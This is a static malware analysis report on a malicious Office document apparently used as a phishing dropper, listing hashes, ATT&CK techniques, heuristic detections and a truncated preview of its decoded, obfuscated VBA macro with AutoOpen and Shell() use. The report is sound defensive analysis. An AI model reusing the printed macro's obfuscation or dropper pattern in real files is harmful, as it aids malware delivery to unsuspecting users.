Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f05e7c7356d5ee4…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 203.0 KB
First seen: 2018-01-23
MD5: ceb22bad77ec767a7e77a4391ee356da
SHA-1: f596623078b5ed56001d614c14834ace29fb2b3d
SHA-256: 3f05e7c7356d5ee4e9e46b6e74b5f06d171433e5fe2c771564d8b1df1f7432c9
Risk score: 222

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen procedure (executed automatically when the document is opened) and a Shell() call (process execution), indicating malicious intent. The embedded URL 'http://Ftn+FtnmGts+GtsetriFtn+FtH8SAf' is flagged as likely being used to download a second-stage payload; note, however, that this string is not a valid hostname ('+' is not permitted in a host name) and carries the same 'Ftn+Ftn' / 'Gts+Gts' filler tokens that appear inside the macro's Mid() strings, so it is more plausibly a fragment of the obfuscated string-concatenation than a resolvable download location. The heuristic 'Password-protected archive handoff' indicates the document carries password instructions for an archive or attachment, a pattern commonly used to keep the payload encrypted until after gateway scanning and consistent with a phishing lure.

Heuristics (6)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium] (OLE_VBA_MACROS), 2 related findings
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Password-protected archive handoff [high] (SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment; this is often used to keep payloads encrypted until after gateway scanning
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://Ftn+FtnmGts+GtsetriFtn+FtH8SAf (channel: in document text, OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body); this is the standard DrawingML XML namespace URI and is expected in Office documents, not a network indicator

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 78850 bytes
SHA-256: 1bf97fb096d56cb301ae0d1bafb165aa2ba1aa03976953686e2f651b981c6e70

Preview of the extracted script (first 1,000 lines shown):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "CSBawElibM"
Function fIMEWzP()
On Error Resume Next
FLHbWri = zRHbJEbSqDJVD - CBool(zvzTiiGkjjZRf) * 216045258 / Sqr(jaXNXqqALdVpUQ) + SPhBNpVkSKsjOi / Atn(9898) * BsYjlPjwzNA - CDate(376) - jVwsJqmQRsPSFL / 3 + EDfJcRkccRoij / SkoNslOTRjpc
EhQzSKtoEn = tvJXicwuYrHPp - CBool(JLiDwpinSmm) * 216045258 / Sqr(folTzdZ) + NEjoHPAMOP / Atn(9898) * hPOEwbapZEFd - CDate(376) - kjzKJFuiqS / 3 + EftwioVYD / FmQjmsW
zsmjQAqtl = KGApMqszHnHoz + Mid("vZHnwApAF8wjIhqOsbuqqJm8q44BWwElUuasd = Ftn+FtnneFtn+FtnGts+Gt'+'sw-oGts+Gtsbject Ftn+FtnrandoFtn+Ft'+'nm;LAFtn+FtnwFtn+FiXqzl", 35, 87) + uNKKinP
qlcvM = JJcGbaZbt - CBool(DYiwtVbVM) * 216045258 / Sqr(iwHbEMZ) + llvTAzbSALM / Atn(9898) * KKZRlpN - CDate(376) - UwpOdYnLBBBP / 3 + zqHWjXf / bVQIItTYqp
vHkhEvX = IjApjdAQf - CBool(DiFwXwp) * 216045258 / Sqr(lhzvZQtjU) + iiVlPzqoiarJz / Atn(9898) * womdSDDiPUw - CDate(376) - QMHkvwIKlAiSSF / 3 + iUOYciZ / kiPQQmAOBoSjdj
jklzOus = RiPtcZF - CBool(fTmLLlQNpD) * 216045258 / Sqr(otwSHKWG) + FjwGvowQ / Atn(9898) * OKWcVvsiFm - CDate(376) - hpXRFGIUPH / 3 + FStPzVfQXmzq / spMYAadEjhi
HYFbMb = wmHmvhqbM + Mid("LR3IAiXShEXzWIKMjOiQa+FtncFtn+Ftnh(LFtn+FtnAwFtn'+'+FtnabFtn+FtncFtn+Ftn iFtn+Ftnn LFtn+FtnAwbFtn+FtncdrG", 22, 82) + QwJzDNURu
MajpDGD = fuAoovFTLNzUJA - CBool(TOrNWGffsYkljd) * 216045258 / Sqr(WcBajic) + kDfKEDTRrOGUD / Atn(9898) * QKnzPIQDJYqKr - CDate(376) - SiRRrVGJrv / 3 + bYGtXaIwiMr / jPTdjtGUuMwwI
VBVZNwHV = qHXSAzMaalm - CBool(WDWLHELi) * 216045258 / Sqr(UkwOKWn) + HZiozcwE / Atn(9898) * zAiLFtAKrmpFJD - CDate(376) - UcWXZDpaYR / 3 + MEVWaZHJGK / qOqwETjwDzWLTX
mEobvjPdIvK = hPaHlblfOtG - CBool(vKbkTWHHnj) * 216045258 / Sqr(pXNOmFpLqhRrXI) + YKMBzTC / Atn(9898) * zXanYDI - CDate(376) - nAPljYNzaYh / 3 + rdTEbRwzv / jfmVNqLRRIhD
QHzlvECWC = odilGSsYnjJJlw + Mid("fRYIMbVQinU8NkSt12pLwuW5TnR.Ftn+FtGts+GtsnSpliFtn+Ftnt(m9R,Ftn+Ftnm9R);LAwkFtn+FtnarapaFtn+FtnsFtn+FtGts+Gtsn FtGts+Gtsn+Ftn= LAwnsadasd.nFtn+Ftnext(1Gts+Gt'+'sFtn+Gts+GtsFtn, 34FR9RK", 26, 154) + NMIbviCYsZQl
XqDqlBtqMYL = ZfuIZJtl - CBool(woVMQwAwLVlH) * 216045258 / Sqr(bzWqaOWqsCwT) + bOwlpwc / Atn(9898) * BPwXiEzZ - CDate(376) - wlzrEvl / 3 + jfPrDmWsPWmz / fpiYZjXTsJY
ANEBYHXh = vfpBjNzAtEsvX - CBool(ucdFTlvItOso) * 216045258 / Sqr(EBFodJCdmRLFV) + cCNwRGzS / Atn(9898) * trwEwmlbJ - CDate(376) - UswnQPmVEILSA / 3 + ZSGjRaiullLwjE / rApBMBS
SznnXGv = KbZTwVSiLOOr - CBool(raLiKXHzTk) * 216045258 / Sqr(YYRHbGvoZb) + oSkQzpsGw / Atn(9898) * PuWqmuRHLiqrC - CDate(376) - YDKDESaRucltwt / 3 + RGNljJdvRp / dhNsXzPp
iCzDiU = sDMUIXSNC + Mid("6aFkjQC9nbiJjjFZX6]110),[stRINg][CHAr]39KRn2CN4", 19, 22) + RNRzcbfS
kOcmT = OwjfkuKEbrz - CBool(djFJiJaHMbT) * 216045258 / Sqr(hONIVQnvGorj) + vzzajkFjacKu / Atn(9898) * SDbLRmdzzVhC - CDate(376) - LDEXpoWXnLaj / 3 + rOCGlCNozkT / WFFozbSYzZBcCn
kvrONJbas = BrmQNljnp - CBool(UJOqdCVTVBvHL) * 216045258 / Sqr(nLwhUfzTh) + lXuTuisLjjEcvS / Atn(9898) * NnzSrWtjXdC - CDate(376) - zSKsAcREFHCZr / 3 + jXfKKQfD / szAparrX
CVNHuTiGhwv = IHhSMaEwfpfS - CBool(SQkKqtHsnjDLi) * 216045258 / Sqr(aUnGZqHtWDcCU) + lzwOvaSLiYap / Atn(9898) * rUYiGdiddsiF - CDate(376) - lZtjhoZUGok / 3 + QIZPmOjjIPYwZ / ZlJIHQJTos
wBwJFtqqlNj = XJfrBilvPu + Mid("l).reP'+'lacE(Gt3tXPnlfkMhf", 2, 15) + jiouNTkcSjQjp
CSzfp = sqssZnDAdNXGk - CBool(binWBMSlHv) * 216045258 / Sqr(RuzmrMOk) + hAQrwrHK / Atn(9898) * SfAHXZHmVqKX - CDate(376) - jwjHsDN / 3 + AIVXsaSwXJFH / pQKKXafErYZoaR
YFVLiJR = VusuIrODdH - CBool(scIWHiuwwPr) * 216045258 / Sqr(nXJqklLAO) + CboWNnhQiWA / Atn(9898) * coLrsWDYDIdhEW - CDate(376) - BiRSHQOajhlQHR / 3 + hVMrvUistowq / tzHRrnflREt
ALfGjCNTos = VdiiJkviSJzljJ - CBool(KAXufZr) * 216045258 / Sqr(qNtsUYUXmou) + aNQImjBMppE / Atn(9898) * XDFGWmqXd - CDate(376) - sVPsaJw / 3 + MzmiawjOIvYf / AIbURTNAAzXB
YkjMQ = KrzDwzRWf + Mid("N8tnbFtn
... (truncated)